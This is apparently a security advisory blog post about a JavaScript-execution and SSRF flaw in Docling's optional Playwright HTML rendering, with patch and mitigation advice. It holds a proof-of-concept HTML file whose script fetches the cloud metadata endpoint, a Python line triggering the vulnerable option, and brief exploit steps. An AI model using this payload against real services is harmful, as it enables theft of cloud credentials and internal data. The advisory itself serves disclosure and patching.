Listen to this Post
In Docling versions between 2.82.0 (inclusive) and 2.91.0 (exclusive), the Playwright-based HTML rendering feature contains a critical design flaw when explicitly enabled. While the rendering option is disabled by default, systems that activate it to process untrusted HTML become vulnerable to arbitrary JavaScript execution and unrestricted network access. The root cause lies in the insecure default configuration of the Playwright browser context, which both permits JavaScript execution and fails to isolate network requests from the host environment.
An attacker can embed malicious JavaScript code within an HTML document. When Docling renders this document using its Playwright backend, the code executes within the browser context. This allows the attacker to steal session cookies, manipulate the DOM, or perform port scans on the local network. More dangerously, the same context can make arbitrary HTTP requests to internal services (such as cloud metadata endpoints, internal APIs, or databases) because there are no network restrictions in place. This server-side request forgery (SSRF) vector can lead to data exfiltration or, in worst-case scenarios, remote code execution if an internal service exposes a vulnerable API.
Because the Playwright instance runs with the same privileges as the Docling process, a successful attack bypasses traditional front-end sandboxing. The vulnerability is particularly dangerous in document parsing pipelines that accept user-uploaded HTML files and automatically render them for analysis or preview. Attackers do not need any special privileges beyond the ability to supply a malicious HTML document. The impact is amplified in containerized or cloud environments where internal metadata services are commonly accessible over HTTP.
DailyCVE Form:
Platform: Docling
Version: 2.82.0-2.90.x
Vulnerability : JavaScript execution/SSRF
Severity: High
date: 2026-06-03
Prediction: Patched in 2.91.0
What Undercode Say:
Check currently installed Docling version
pip show docling | grep Version
Simulate vulnerable configuration (DO NOT run in production)
cat > malicious.html <<EOF
<html><body>
<script>
fetch('http://169.254.169.254/latest/meta-data/')
.then(r => r.text())
.then(data => console.log(data));
</script>
<h1>PoC: SSRF via Playwright</h1>
</body></html>
EOF
Test with vulnerable Docling (2.82.0 - 2.90.x)
python -c "
from docling.document_converter import DocumentConverter
conv = DocumentConverter()
conv.convert('malicious.html', render_page=True) render_page=True = vulnerable
"
Verify fix in version >=2.91.0
pip install docling==2.91.0
After upgrade, JavaScript is disabled and network is offline
Exploit:
- Craft an HTML file containing JavaScript that makes internal network requests (e.g., to `http://169.254.169.254/` or internal API endpoints).
- Submit the malicious HTML to any Docling-based service that has `render_page=True` enabled for untrusted input.
- The Playwright rendering context executes the JavaScript, exfiltrating internal data or performing unauthorized actions.
Protection:
- Upgrade to Docling version 2.91.0 or later.
- If upgrade is impossible, never set `render_page=True` when processing untrusted HTML documents.
- After upgrading, ensure `java_script_enabled=False` is enforced and `enable_remote_fetch` is disabled (offline mode).
Impact:
- Arbitrary JavaScript execution in the rendering context.
- Unrestricted network access leading to SSRF (including access to cloud metadata endpoints).
- Potential data exfiltration or remote code execution if internal services are reachable.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
